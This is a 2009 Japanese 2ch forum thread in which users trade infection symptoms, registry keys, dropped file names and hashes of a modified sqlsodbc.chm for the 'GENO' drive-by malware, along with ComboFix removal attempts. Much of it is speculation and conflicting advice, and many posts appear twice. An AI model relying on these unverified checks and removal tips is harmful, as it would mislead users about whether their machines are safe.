対策されん希ガス。
進入経路が確定しないってのもヤだよな。
http://www3.atword.jp/gnome/2009/04/08/unexpected-latvia-tour-its-still-free/
ここで紹介されてるパターンだと、FTPのパスワードが盗まれた(簡単過ぎた?)ことが
原因らしいが・・・・・。
未だサイトを閉じないパピーヌと日本クレストロンはどう対処する気なんだ。
クレストロンは鯖が米国にあるっぽいので向こうの営業時間(明日未明)にならんと
対策されん希ガス。
78 :名無しさん@お腹いっぱい。:2009/04/08(水) 20:29:05
>>74
踏んだ時刻を大体覚えてればCドライブの一週間以内に変更されたファイルを
検索して踏んだ時刻近辺に変更されたファイルを精査すれば感染/非感染が分かりそう。
自分のをざっとやってみたけど踏んだ時間近辺で変更されてるのは専ブラのdatと
avastのログファイルくらいだった。
chmはヘルプファイルだから最近インスコしたソフトがなければそう簡単に更新されたり
しないから分かり易いね。
踏んだ時刻を大体覚えてればCドライブの一週間以内に変更されたファイルを
検索して踏んだ時刻近辺に変更されたファイルを精査すれば感染/非感染が分かりそう。
自分のをざっとやってみたけど踏んだ時間近辺で変更されてるのは専ブラのdatと
avastのログファイルくらいだった。
chmはヘルプファイルだから最近インスコしたソフトがなければそう簡単に更新されたり
しないから分かり易いね。
79 :名無しさん@お腹いっぱい。:2009/04/08(水) 20:34:05
だからメモ帳起動するとnotepad.exeが変な動きしたりしてたのか。
notepad.exe
ApntEx.exe
imapi.exe
lsass.exe
他...
結論は>>71か。
ウイルスの主な活動は乗っ取った正規プログラムで、
後はその家庭で作成したファイルを削除しちゃうからログ取得ツールにも表れないわけだ
notepad.exe
ApntEx.exe
imapi.exe
lsass.exe
他...
結論は>>71か。
ウイルスの主な活動は乗っ取った正規プログラムで、
後はその家庭で作成したファイルを削除しちゃうからログ取得ツールにも表れないわけだ
80 :名無しさん@お腹いっぱい。:2009/04/08(水) 20:36:12
>>77
もしかすると前にν速のスレでおいらが半分冗談で言ってたんだけど、
ウィルス付きメール等で事前に内部的にパスワードが盗まれて
その後堂々とFTPログインされて好き勝手に書き換えられたのかも知れないね。
あまりに杜撰すぎるけど、他で爆発的に感染していない所を見ると
この種の致命的なオペレーションレベルでのミスを見過ごしてこーいう事態を招いたのかも知れないね。
いずれにしても食らった楽天のショップが特定の1件だけって所が妙だと個人的には思ってて、
単純に外部からアタックされてやられるのならもっと楽天のショップが大量に食らっててもおかしくない話だからね。
もしかすると前にν速のスレでおいらが半分冗談で言ってたんだけど、
ウィルス付きメール等で事前に内部的にパスワードが盗まれて
その後堂々とFTPログインされて好き勝手に書き換えられたのかも知れないね。
あまりに杜撰すぎるけど、他で爆発的に感染していない所を見ると
この種の致命的なオペレーションレベルでのミスを見過ごしてこーいう事態を招いたのかも知れないね。
いずれにしても食らった楽天のショップが特定の1件だけって所が妙だと個人的には思ってて、
単純に外部からアタックされてやられるのならもっと楽天のショップが大量に食らっててもおかしくない話だからね。
アスロンでデータ実行防止してるPCのvirtualPC上のXPsp2で実行ね
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\aux
は%実行フォルダ%\..\bcrg.rhn(名前はランダムかも)
HKLM\SYSTEM\ControlSet001\Control\Session Manager\PendingFileRenameOperations
は
\??\C:\_.t
になってた
sqlsodbc.chm はファイルサイズが本来50727byteから1323byteへ。
タイムスタンプは多分変わらず作成日時と更新日時が2004/08/10
そのまま再起動するも異常に時間がかかるので電源off
セーフモードで再起動->システムの復元をしたがsqlsodbc.chmは改変されたまま
そのままsqlsodbc.chmを踏んでみたけど
mk::@MSITStore:C:\WINDOWS\system32\sqlsodbc.chm を開けません。
とダイアログが出るだけ
あとはわからん
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\aux
は%実行フォルダ%\..\bcrg.rhn(名前はランダムかも)
HKLM\SYSTEM\ControlSet001\Control\Session Manager\PendingFileRenameOperations
は
\??\C:\_.t
になってた
sqlsodbc.chm はファイルサイズが本来50727byteから1323byteへ。
タイムスタンプは多分変わらず作成日時と更新日時が2004/08/10
そのまま再起動するも異常に時間がかかるので電源off
セーフモードで再起動->システムの復元をしたがsqlsodbc.chmは改変されたまま
そのままsqlsodbc.chmを踏んでみたけど
mk::@MSITStore:C:\WINDOWS\system32\sqlsodbc.chm を開けません。
とダイアログが出るだけ
あとはわからん
82 :名無しさん@お腹いっぱい。:2009/04/08(水) 20:44:46
>>80
一応海外にも被害は出てて拡散しているらしい
日本人は英語のスパムにはそうそう釣られないと思うんだよなあ
こんなのがあった
http://www3.atword.jp/gnome/2009/04/08/unexpected-latvia-tour-its-still-free/
一応海外にも被害は出てて拡散しているらしい
日本人は英語のスパムにはそうそう釣られないと思うんだよなあ
こんなのがあった
http://www3.atword.jp/gnome/2009/04/08/unexpected-latvia-tour-its-still-free/
83 :名無しさん@お腹いっぱい。:2009/04/08(水) 20:46:56
>>81
CHMファイルのタイムスタンプはオリジナルのままなのか。。。
CHMファイルのタイムスタンプはオリジナルのままなのか。。。
84 :名無しさん@お腹いっぱい。:2009/04/08(水) 20:50:17
>>81
VPC動作したのか・・・orz
感染したと思いこんでるやつように確認方法として
・ブラウジング中によく落ちる
・sqlsodbc.chmが改変されていないか確かめてみる
↓みんなこの値?
(MD5 f639afde02547603a3d3930ee4bf8c12)
VPC動作したのか・・・orz
感染したと思いこんでるやつように確認方法として
・ブラウジング中によく落ちる
・sqlsodbc.chmが改変されていないか確かめてみる
↓みんなこの値?
(MD5 f639afde02547603a3d3930ee4bf8c12)
85 :名無しさん@お腹いっぱい。:2009/04/08(水) 20:50:24
>>82
そこはさっき目を通したわ。
リンクが紫だw
昨夜明け方にラトビアのIP等を元にぐぐったら
3/28頃から中国、アメリカ、フランス、イタリア等の掲示板で
感染サイトらしき所のWebマスターの相談のスレッドが立ってたりしたわ。
そこはさっき目を通したわ。
リンクが紫だw
昨夜明け方にラトビアのIP等を元にぐぐったら
3/28頃から中国、アメリカ、フランス、イタリア等の掲示板で
感染サイトらしき所のWebマスターの相談のスレッドが立ってたりしたわ。
86 :名無しさん@お腹いっぱい。:2009/04/08(水) 20:51:23
>>84
sqlsodbc.chmはタイムスタンプじゃなくてハッシュで確認しないと駄目だね。これ。
sqlsodbc.chmはタイムスタンプじゃなくてハッシュで確認しないと駄目だね。これ。
VPC上で動作したのか・・・orz
に訂正・・・
に訂正・・・
88 :名無しさん@お腹いっぱい。:2009/04/08(水) 20:52:09
GENOウイルスが世界デビューしてる
89 :名無しさん@お腹いっぱい。:2009/04/08(水) 20:59:27
これ拡大すんの?
90 :名無しさん@お腹いっぱい。:2009/04/08(水) 20:59:56
件のサイト群は見てないのに、Wikiに書いてあるcmd.exeが勝手に動いてて
メモリを消費してるという感染済みっぽい挙動を確認したんだけど
やっぱ報告されてないだけで世界的に感染してるHPがあるんかな。
暫くはまともにネット見れなさそうね。
メモリを消費してるという感染済みっぽい挙動を確認したんだけど
やっぱ報告されてないだけで世界的に感染してるHPがあるんかな。
暫くはまともにネット見れなさそうね。
91 :名無しさん@お腹いっぱい。:2009/04/08(水) 21:00:22
>>84
だね>ハッシュ値
だね>ハッシュ値
92 :名無しさん@お腹いっぱい。:2009/04/08(水) 21:01:32
93 :名無しさん@お腹いっぱい。:2009/04/08(水) 21:03:18
詳細が分かるまでVMで大人しくネットするしかないな
だれかハッシュ値確認お願いしませう
95 :名無しさん@お腹いっぱい。:2009/04/08(水) 21:12:38
>>84
同じ
同じ
96 :名無しさん@お腹いっぱい。:2009/04/08(水) 21:12:58
97 :名無しさん@お腹いっぱい。:2009/04/08(水) 21:13:16
もとからsqlsodbc.chmなんてファイルがないんだが・・・
98 :名無しさん@お腹いっぱい。:2009/04/08(水) 21:14:03
99 :名無しさん@お腹いっぱい。:2009/04/08(水) 21:14:30
>>84
無印XPにSP3を適用してWindowsUpdate 当てまくりで
何回かテストで踏んでるけど、全てNorton先生に撃退してもらってる環境。
一致してる。詳細は↓の通り。
ついでに全然感染サイトを踏んでいないファイルサーバーのServer2003SP2のも
タイムスタンプこそ↓とは違うけどCRC32,MD5共に一致してる。
sqlsodbc.chm
C:\WINDOWS\system32
50,727バイト
作成日時
2001年8月27日 月曜日、21:00:00
更新日時
2001年8月27日 月曜日、21:00:00
CRC32
B61C7A80
MD5
F639AFDE02547603A3D3930EE4BF8C12
無印XPにSP3を適用してWindowsUpdate 当てまくりで
何回かテストで踏んでるけど、全てNorton先生に撃退してもらってる環境。
一致してる。詳細は↓の通り。
ついでに全然感染サイトを踏んでいないファイルサーバーのServer2003SP2のも
タイムスタンプこそ↓とは違うけどCRC32,MD5共に一致してる。
sqlsodbc.chm
C:\WINDOWS\system32
50,727バイト
作成日時
2001年8月27日 月曜日、21:00:00
更新日時
2001年8月27日 月曜日、21:00:00
CRC32
B61C7A80
MD5
F639AFDE02547603A3D3930EE4BF8C12
100 :名無しさん@お腹いっぱい。:2009/04/08(水) 21:21:23
踏んでウイルス食らった後に、検出できるのか?
他スレで完全スルーしたって話でてるな・・
他スレで完全スルーしたって話でてるな・・
101 :名無しさん@お腹いっぱい。:2009/04/08(水) 21:21:29
と思ったらちゃんとあったw
f639afde02547603a3d3930ee4bf8c12 c:\windows\system32\sqlsodbc.chm
f639afde02547603a3d3930ee4bf8c12 c:\windows\system32\sqlsodbc.chm
102 :名無しさん@お腹いっぱい。:2009/04/08(水) 21:27:32
adobeサイトでフラッシュとリーダーを更新しようとしたら
IE7がフリーズするんだけど感染してるのかな?
sqlsodbc.chmのハッシュは
f639afde02547603a3d3930ee4bf8c12 なんだけど・・・
IE7がフリーズするんだけど感染してるのかな?
sqlsodbc.chmのハッシュは
f639afde02547603a3d3930ee4bf8c12 なんだけど・・・
103 : ◆N9P3SuvBPo :2009/04/08(水) 21:29:08
>99
特攻機で踏んだけど、作成日とか違えどサイズもハッシュもあなたのと同じです。
特攻機で踏んだけど、作成日とか違えどサイズもハッシュもあなたのと同じです。
104 :名無しさん@お腹いっぱい。:2009/04/08(水) 21:35:17
/)
///)
/,.=゙''"/
/ i f ,.r='"-‐'つ____ キャッシュ削除すりゃぁいいんだよ!!
/ / _,.-‐'~/⌒ ⌒\
/ ,i ,二ニ⊃( ●). (●)\
/ ノ il゙フ::::::⌒(__人__)⌒::::: \
,イ「ト、 ,!,!| |r┬-| |
/ iトヾヽ_/ィ"\ `ー'´ /
///)
/,.=゙''"/
/ i f ,.r='"-‐'つ____ キャッシュ削除すりゃぁいいんだよ!!
/ / _,.-‐'~/⌒ ⌒\
/ ,i ,二ニ⊃( ●). (●)\
/ ノ il゙フ::::::⌒(__人__)⌒::::: \
,イ「ト、 ,!,!| |r┬-| |
/ iトヾヽ_/ィ"\ `ー'´ /
105 :名無しさん@お腹いっぱい。:2009/04/08(水) 21:45:48
VISTAは感染しないって本当なの?
106 :名無しさん@お腹いっぱい。:2009/04/08(水) 21:49:46
107 :名無しさん@お腹いっぱい。:2009/04/08(水) 21:57:33
GENOウイルスはなかった
108 :名無しさん@お腹いっぱい。:2009/04/08(水) 21:57:59
>>90
Adobe ReaderやFlashが古い状態だと可能性あります
ちなみに踏んだURLを教えてくれると助かる
直接貼られると危ないんでリンク外れる程度におねがいします
もしくは他のウィルスに感染してたかです
Adobe ReaderやFlashが古い状態だと可能性あります
ちなみに踏んだURLを教えてくれると助かる
直接貼られると危ないんでリンク外れる程度におねがいします
もしくは他のウィルスに感染してたかです
109 :名無しさん@お腹いっぱい。:2009/04/08(水) 21:59:26
110 :名無しさん@お腹いっぱい。:2009/04/08(水) 22:03:14
http://news.goo.ne.jp/article/internet/business/it/iw2009040809-internet.html
PC通販サイト「GENO」のサイトに改ざんの疑い
INTERNET Watch2009年4月8日(水)00:30
PC通販サイト「GENO」のサイトに改ざんの疑い
INTERNET Watch2009年4月8日(水)00:30
111 :名無しさん@お腹いっぱい。:2009/04/08(水) 22:06:22
>>105
こういう話もあるよ。
http://takeshima.2ch.net/test/read.cgi/news4vip/1239059037/448
448 以下、名無しにかわりましてVIPがお送りします 2009/04/07(火) 20:05:12.93 ID:jaXpHGCM0
まぁかなり話題になってるから知ってるだろうけど
アドビ9.0以前の脆弱性を付いたウイルスだから、今のうちに
更新しとけ
ちなみに感染してしまうとアドビが5分に1回ペースで更新を要求してくるという
鬱陶しさ(おそらくウイルスの仕様)
vistaならセーフって解釈は間違いで、vistaでも更新かけてない奴はアウト
ソースは昨年11月から未更新の俺のvista
こういう話もあるよ。
http://takeshima.2ch.net/test/read.cgi/news4vip/1239059037/448
448 以下、名無しにかわりましてVIPがお送りします 2009/04/07(火) 20:05:12.93 ID:jaXpHGCM0
まぁかなり話題になってるから知ってるだろうけど
アドビ9.0以前の脆弱性を付いたウイルスだから、今のうちに
更新しとけ
ちなみに感染してしまうとアドビが5分に1回ペースで更新を要求してくるという
鬱陶しさ(おそらくウイルスの仕様)
vistaならセーフって解釈は間違いで、vistaでも更新かけてない奴はアウト
ソースは昨年11月から未更新の俺のvista
112 :名無しさん@お腹いっぱい。:2009/04/08(水) 22:11:52
>>108
騒ぎが起こる前にReaderは9.1.0、Flashも10.0.22.87にしてあった。
踏んだURLは本当に気付いたらこうなってたので
どれが原因かは分からない。すまん
avast!で今チェックが終わったところだけど、感染0だったから
他のウィルスではない、と思う。あとでカスペルスキー等も試さないと…
あと、ついでだからsqlsodbc,chmのハッシュ値とかも書いておく
50,727 バイト
作成日時 2007年5月15日、16:26:18
更新日時 2006年3月2日、21:00:00
MD5 F639AFDE02547603A3D3930EE4BF8C12
騒ぎが起こる前にReaderは9.1.0、Flashも10.0.22.87にしてあった。
踏んだURLは本当に気付いたらこうなってたので
どれが原因かは分からない。すまん
avast!で今チェックが終わったところだけど、感染0だったから
他のウィルスではない、と思う。あとでカスペルスキー等も試さないと…
あと、ついでだからsqlsodbc,chmのハッシュ値とかも書いておく
50,727 バイト
作成日時 2007年5月15日、16:26:18
更新日時 2006年3月2日、21:00:00
MD5 F639AFDE02547603A3D3930EE4BF8C12
113 :名無しさん@お腹いっぱい。:2009/04/08(水) 22:12:00
84と同じなら99%感染してないと思う
GENO含めその他のサイトで同ウイルスの感染実験したが
必ずsqlsodbcは改変された
亜種にすぐに変わるようなウイルスじゃなさそうだし、
有効な確認手段だと思う
感染してる場合は“a”から始まるハッシュ値だった(メモしわすれたorz)
GENO含めその他のサイトで同ウイルスの感染実験したが
必ずsqlsodbcは改変された
亜種にすぐに変わるようなウイルスじゃなさそうだし、
有効な確認手段だと思う
感染してる場合は“a”から始まるハッシュ値だった(メモしわすれたorz)
114 :名無しさん@お腹いっぱい。:2009/04/08(水) 22:14:58
今調べたんですが、ハッシュってソフト入れてそれで見るんですよね?
初心者質問本当に申し訳ない。
初心者質問本当に申し訳ない。
115 :名無しさん@お腹いっぱい。:2009/04/08(水) 22:17:52
116 :名無しさん@お腹いっぱい。:2009/04/08(水) 22:24:34
>>114
有名どころだと↓をインスコするとか。。。
外人さんが作った物だけど日本語表示化だから。
HashTab Shell Extension
ttp://www.forest.impress.co.jp/lib/sys/file/fileuty/hashtabshlex.html
作者サイト
ttp://beeblebrox.org/hashtab/
有名どころだと↓をインスコするとか。。。
外人さんが作った物だけど日本語表示化だから。
HashTab Shell Extension
ttp://www.forest.impress.co.jp/lib/sys/file/fileuty/hashtabshlex.html
作者サイト
ttp://beeblebrox.org/hashtab/
117 :名無しさん@お腹いっぱい。:2009/04/08(水) 22:27:40
>>116
ありがとうございます
ありがとうございます
118 :名無しさん@お腹いっぱい。:2009/04/08(水) 22:27:56
UACあるのにVistaが感染するわけないだろjk
119 :名無しさん@お腹いっぱい。:2009/04/08(水) 22:31:15
あきらめてクリンインストします・・・
120 :名無しさん@お腹いっぱい。:2009/04/08(水) 22:34:30
sqlsodbc.chmがないんだけど・・・
121 :名無しさん@お腹いっぱい。:2009/04/08(水) 22:36:06
感染してないのはここら辺の問題かと
ttp://www.atmarkit.co.jp/fsys/kaisetsu/045dep/dep.html
ttp://www.atmarkit.co.jp/fsys/kaisetsu/045dep/dep.html
122 :名無しさん@お腹いっぱい。:2009/04/08(水) 22:37:30
クリーンインスコする前にcombofix使えよ
123 :名無しさん@お腹いっぱい。:2009/04/08(水) 22:48:39
combofix使っても無駄だろ・・・・・
124 :名無しさん@お腹いっぱい。:2009/04/08(水) 22:53:47
>>84
うちのは
CRC32: B61C7A80
MD5: F639AFDE02547603A3D3930EE4BF8C12
SHA-1: FBDD32ED13D27E4102621E1067FDF3634F33B2C3
と出ているのですけどこれは改変されていないのでしょうか?
うちのは
CRC32: B61C7A80
MD5: F639AFDE02547603A3D3930EE4BF8C12
SHA-1: FBDD32ED13D27E4102621E1067FDF3634F33B2C3
と出ているのですけどこれは改変されていないのでしょうか?
125 :名無しさん@お腹いっぱい。:2009/04/08(水) 22:54:41
>>124
大文字小文字の差異はあれ一致だね
大文字小文字の差異はあれ一致だね
126 ::名無しさん@お腹いっぱい:2009/04/08(水) 22:55:06
IEやFirefoxが不安定、regedit起動不可等
trojan.killAV に感染してた、ノートン試用版にて駆除
今のところおかしな動きなしです。
trojan.killAV に感染してた、ノートン試用版にて駆除
今のところおかしな動きなしです。
127 :名無しさん@お腹いっぱい。:2009/04/08(水) 22:55:27
>>125
ありがとうございます。
ありがとうございます。
128 :名無しさん@お腹いっぱい。:2009/04/08(水) 22:56:58
感染した人のsqlsodbc.chmはやっぱり全然違うんかな
129 :名無しさん@お腹いっぱい。:2009/04/08(水) 22:59:04
ノートンは対応したのか、NODはまだだよな?
130 :11:2009/04/08(水) 23:05:27
sqlsodbc.chmの場所は
c:\windows\system32\sqlsodbc.chm
です。
Vistaであるかは後で確認する。
ComboFixは場合によってはログインできなくなるかも。
2回ComboFixで駆除を試みたけど、1回目は通常モードで実行して再起動後
ログインできなくなった。
2回目はセーフモードで試し、無事ログインもできたけど処理数0
(つまり何もウイルスを検出せず、ログにも怪しいものは見当たらず)
ComboFixを試すのはいいけどやるんだったらセーフモードで、
ログインできなくなるリスクもあるから自己責任で。。。
(ログインできなくなると、リカバリーCDからしかリカバリできないから
注意)
c:\windows\system32\sqlsodbc.chm
です。
Vistaであるかは後で確認する。
ComboFixは場合によってはログインできなくなるかも。
2回ComboFixで駆除を試みたけど、1回目は通常モードで実行して再起動後
ログインできなくなった。
2回目はセーフモードで試し、無事ログインもできたけど処理数0
(つまり何もウイルスを検出せず、ログにも怪しいものは見当たらず)
ComboFixを試すのはいいけどやるんだったらセーフモードで、
ログインできなくなるリスクもあるから自己責任で。。。
(ログインできなくなると、リカバリーCDからしかリカバリできないから
注意)
131 :名無しさん@お腹いっぱい。:2009/04/08(水) 23:07:21
ビスタも感染するんですよね?しないって言ってる人もいるけど
132 :名無しさん@お腹いっぱい。:2009/04/08(水) 23:07:55
申し訳ありませんが
sqlsodbc.chm
と
sqlsodbc
は同一の扱いなのでしょうか?
sqlsodbc.chm
と
sqlsodbc
は同一の扱いなのでしょうか?
133 :名無しさん@お腹いっぱい。:2009/04/08(水) 23:08:48
134 :名無しさん@お腹いっぱい。:2009/04/08(水) 23:17:14
135 :名無しさん@お腹いっぱい。:2009/04/08(水) 23:18:51
UACあってもVistaで感染するの?そのためのUACだと思ってたんだが
ウザイからUAC切ってるとかいう元麻布みたいなのは放置するとして
ウザイからUAC切ってるとかいう元麻布みたいなのは放置するとして
136 :名無しさん@お腹いっぱい。:2009/04/08(水) 23:20:40
>>135
vistaで踏んだあとxpで再び踏んだら多分アウト
vistaで踏んだあとxpで再び踏んだら多分アウト
137 :名無しさん@お腹いっぱい。:2009/04/08(水) 23:21:14
138 :名無しさん@お腹いっぱい。:2009/04/08(水) 23:24:16
139 :名無しさん@お腹いっぱい。:2009/04/08(水) 23:25:57
GENOウイルススレ
http://pc11.2ch.net/test/read.cgi/sec/1239152979/
【0.1】ネットショップ「GENO」等でウイルス感染 業務再開するもGENOサイドは「キャッシュ消せ」とふざけた対応★10
http://tsushima.2ch.net/test/read.cgi/news/1239178101/
【新種ウイルス】GENOを語るスレ31【無料配布中】
http://pc11.2ch.net/test/read.cgi/pc/1239197673/
【ウイルス】GENOを語るスレ31【完治】
http://pc11.2ch.net/test/read.cgi/pc/1239199378/
【8BOAA】 GENOを語るスレ26 【zif付き】
http://pc11.2ch.net/test/read.cgi/notepc/1232024693/
【顧客相手に】GENOを語るスレ24【サイバージェノサイド】
http://pc11.2ch.net/test/read.cgi/jisaku/1239183817/
★090406 複数板「ウイルスGeno短縮URL」誘導マルチポスト荒らし報告
http://qb5.2ch.net/test/read.cgi/sec2chd/1238968073/
【緊急警報】GENOなどのサイトでウイルス感染(2ちゃんに貼られた不明なリンクへも飛ぶべからず!!)
http://pc11.2ch.net/test/read.cgi/pcnews/1239034325/
PC通販サイト「GENO」のサイトに改ざんの疑い
http://tsushima.2ch.net/test/read.cgi/news/1239185232/
http://pc11.2ch.net/test/read.cgi/sec/1239152979/
【0.1】ネットショップ「GENO」等でウイルス感染 業務再開するもGENOサイドは「キャッシュ消せ」とふざけた対応★10
http://tsushima.2ch.net/test/read.cgi/news/1239178101/
【新種ウイルス】GENOを語るスレ31【無料配布中】
http://pc11.2ch.net/test/read.cgi/pc/1239197673/
【ウイルス】GENOを語るスレ31【完治】
http://pc11.2ch.net/test/read.cgi/pc/1239199378/
【8BOAA】 GENOを語るスレ26 【zif付き】
http://pc11.2ch.net/test/read.cgi/notepc/1232024693/
【顧客相手に】GENOを語るスレ24【サイバージェノサイド】
http://pc11.2ch.net/test/read.cgi/jisaku/1239183817/
★090406 複数板「ウイルスGeno短縮URL」誘導マルチポスト荒らし報告
http://qb5.2ch.net/test/read.cgi/sec2chd/1238968073/
【緊急警報】GENOなどのサイトでウイルス感染(2ちゃんに貼られた不明なリンクへも飛ぶべからず!!)
http://pc11.2ch.net/test/read.cgi/pcnews/1239034325/
PC通販サイト「GENO」のサイトに改ざんの疑い
http://tsushima.2ch.net/test/read.cgi/news/1239185232/
140 :名無しさん@お腹いっぱい。:2009/04/08(水) 23:26:11
UACあってもUserが許可しちゃえば感染するだろ
もう一回感染実験してくるノシ
もう一回感染実験してくるノシ
141 :名無しさん@お腹いっぱい。:2009/04/08(水) 23:27:39
CRCは家の環境でも上のやつで一致でした。
142 :名無しさん@お腹いっぱい。:2009/04/08(水) 23:30:31
旧プログラムw
143 :名無しさん@お腹いっぱい。:2009/04/08(水) 23:34:20
XPでもDEP有効にしてれば防げるのか?
144 :名無しさん@お腹いっぱい。:2009/04/08(水) 23:42:46
XPsp2なんだけど、
sqlsodbc.chm
C:\WINDOWS\system32
1.29 KB (1,323 バイト)
MD5:BF7209B9589AD09A25740F6D47D0ADEA
CRC32:7585CBB6
SHA1:D695F957AA9DEB0E4D92F4546DB3A883B1909008
ファイルサイズからして全然違う。
アウトかね
sqlsodbc.chm
C:\WINDOWS\system32
1.29 KB (1,323 バイト)
MD5:BF7209B9589AD09A25740F6D47D0ADEA
CRC32:7585CBB6
SHA1:D695F957AA9DEB0E4D92F4546DB3A883B1909008
ファイルサイズからして全然違う。
アウトかね
145 :名無しさん@お腹いっぱい。:2009/04/08(水) 23:43:04
>>143
まだわかんない。
ただ、DEP以外にXPでも踏む際のアカウントにAdmin権限やSuperUser権限が無く
単なるUser権限の垢だと大丈夫とか、
そーいう感染から助かる可能性がある条件は多分あると思うよ。
それに元々HDD上のsqlsodbc.chmをリードオンリー属性にしておけば
実際に試していないから確証は無いけど
理論上は少なくてもsqlsodbc.chmに関しては書き換えられる事は防げる筈だと思うし。
まだわかんない。
ただ、DEP以外にXPでも踏む際のアカウントにAdmin権限やSuperUser権限が無く
単なるUser権限の垢だと大丈夫とか、
そーいう感染から助かる可能性がある条件は多分あると思うよ。
それに元々HDD上のsqlsodbc.chmをリードオンリー属性にしておけば
実際に試していないから確証は無いけど
理論上は少なくてもsqlsodbc.chmに関しては書き換えられる事は防げる筈だと思うし。
146 :名無しさん@お腹いっぱい。:2009/04/08(水) 23:43:45
147 :名無しさん@お腹いっぱい。:2009/04/08(水) 23:44:23
>>144
PC挙動もおかしいですか?
PC挙動もおかしいですか?
148 :名無しさん@お腹いっぱい。:2009/04/08(水) 23:48:43
>144
タ、タイムスタンプは?タイムスタンプは変わったの?
タ、タイムスタンプは?タイムスタンプは変わったの?
149 :名無しさん@お腹いっぱい。:2009/04/08(水) 23:48:53
>147
2日前、
WU更新済み、norton2007入れてる状態で、adobe更新前に踏んだ。
IEとプニルがすぐ落ちる等、挙動がおかしかったんで、
avast入れてスキャンするも何も検出されず。
システムの復元は普通にブラウジング出来たんで、
クリンインスコせずに今に至る。
面倒くさがらずにクリンインスコするか
2日前、
WU更新済み、norton2007入れてる状態で、adobe更新前に踏んだ。
IEとプニルがすぐ落ちる等、挙動がおかしかったんで、
avast入れてスキャンするも何も検出されず。
システムの復元は普通にブラウジング出来たんで、
クリンインスコせずに今に至る。
面倒くさがらずにクリンインスコするか
150 :名無しさん@お腹いっぱい。:2009/04/08(水) 23:49:04
sqlsodbc.chmの
更新日時が1年前だったが、これは大丈夫かな?
更新日時が1年前だったが、これは大丈夫かな?
151 :名無しさん@お腹いっぱい。:2009/04/08(水) 23:52:41
152 :名無しさん@お腹いっぱい。:2009/04/08(水) 23:53:07
>148
作成日時:2005年3月29日、17:20:39
更新日時:2007年4月17日、0:53:08
作成日時:2005年3月29日、17:20:39
更新日時:2007年4月17日、0:53:08
153 :名無しさん@お腹いっぱい。:2009/04/08(水) 23:53:31
>>150
今すぐファイルサイズ確認しれw
今すぐファイルサイズ確認しれw
154 :名無しさん@お腹いっぱい。:2009/04/08(水) 23:58:49
>>152
重要な情報だわ。
なんかそのハンパな日時が肝なのかもね。
基本的にこのCHMファイル自体はWindowsUpdate等でパッチが当たるファイルじゃないから、
本来は個々のWindowsの他のシステムファイルと同じ日時の筈なんだけど、
少なくてもその種の日付で保存されるとなると
まだ断定出来ないけどウィルスのプログラム等で自動生成された物ではないのかもしれないわ。
重要な情報だわ。
なんかそのハンパな日時が肝なのかもね。
基本的にこのCHMファイル自体はWindowsUpdate等でパッチが当たるファイルじゃないから、
本来は個々のWindowsの他のシステムファイルと同じ日時の筈なんだけど、
少なくてもその種の日付で保存されるとなると
まだ断定出来ないけどウィルスのプログラム等で自動生成された物ではないのかもしれないわ。
155 :名無しさん@お腹いっぱい。:2009/04/08(水) 23:59:32
156 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:03:39
avastで踏むも更新前だったのでスルー
その後a-squadで検出・削除
readerは8.14、フラッシュは最新だったと思う
不気味な事に不審な挙動全く無し・異常なし・・・
これってもうゾンビにされてる?
その後a-squadで検出・削除
readerは8.14、フラッシュは最新だったと思う
不気味な事に不審な挙動全く無し・異常なし・・・
これってもうゾンビにされてる?
157 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:05:55
158 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:06:13
人柱となった代わりに、
踏み台にされると実際どんな被害があるのか教えてくれないか?
とりあえず、すぐにでも再インスコした方がいいよね…
踏み台にされると実際どんな被害があるのか教えてくれないか?
とりあえず、すぐにでも再インスコした方がいいよね…
160 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:07:14
えと、最近使ったファイルに最近使った試しのないファイルがどんどん出ているけど
まさかこれ暴れだしたってことだろうか
まさかこれ暴れだしたってことだろうか
161 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:07:24
>>99ダタ
162 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:08:56
数回にわたる作業の末やっとましな結果が出た。
Tempにiexplore.exe→iexploreがsqlsodbc.chm、bxatg.mnn、u.batを作成
で、、感染確認後セーフモードでComboFixでbxatg.mnnを隔離
再起動後、レジストリエディタ起動、特定のサイト
(bleepingcomputerからのComboFix.exeダウンロードリンク)へのアクセス成功、
ブラウザ安定でかなりいい結果じゃないかと。
bxatg.mnnの検体は可否スレに報告しておきます。
で、ComboFixで駆除を試みたのは計三回なのですが二回とも失敗
一回目は、通常モードでComboFixを実行、"bxatg.mnn"と思われるファイルを
ComboFixが発見し再起動後(ComboFixによるPC再起動)ログインできなくなる。
二回目は、セーフモードでComboFixを実行するも、何も検出せず・・・
三回目(今回)再びセーフモードで以上の結果でした。
もうちょっと検証必要っぽいので"ComboFixを過信"しないように
またsqlsodbc.chmは改変されたままで、開こうとしても開けず改変されたsqlsodbc.chm
は今のところ実害なし(?)この改変されたやつのハッシュは
ae325e35760718d46bcebc4ad5fab953
Tempにiexplore.exe→iexploreがsqlsodbc.chm、bxatg.mnn、u.batを作成
で、、感染確認後セーフモードでComboFixでbxatg.mnnを隔離
再起動後、レジストリエディタ起動、特定のサイト
(bleepingcomputerからのComboFix.exeダウンロードリンク)へのアクセス成功、
ブラウザ安定でかなりいい結果じゃないかと。
bxatg.mnnの検体は可否スレに報告しておきます。
で、ComboFixで駆除を試みたのは計三回なのですが二回とも失敗
一回目は、通常モードでComboFixを実行、"bxatg.mnn"と思われるファイルを
ComboFixが発見し再起動後(ComboFixによるPC再起動)ログインできなくなる。
二回目は、セーフモードでComboFixを実行するも、何も検出せず・・・
三回目(今回)再びセーフモードで以上の結果でした。
もうちょっと検証必要っぽいので"ComboFixを過信"しないように
またsqlsodbc.chmは改変されたままで、開こうとしても開けず改変されたsqlsodbc.chm
は今のところ実害なし(?)この改変されたやつのハッシュは
ae325e35760718d46bcebc4ad5fab953
163 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:09:06
164 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:11:14
>>163
俺はavastだけどなんか攻撃うけてますっていうメッセージが右下から出てくる
俺はavastだけどなんか攻撃うけてますっていうメッセージが右下から出てくる
165 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:12:37
>>159への害はPC激重、キーロガーでこれから打つキー情報抜かれるかもetc.。
でも最インスコすれば失った時間と消すことになるデータ以外は解決
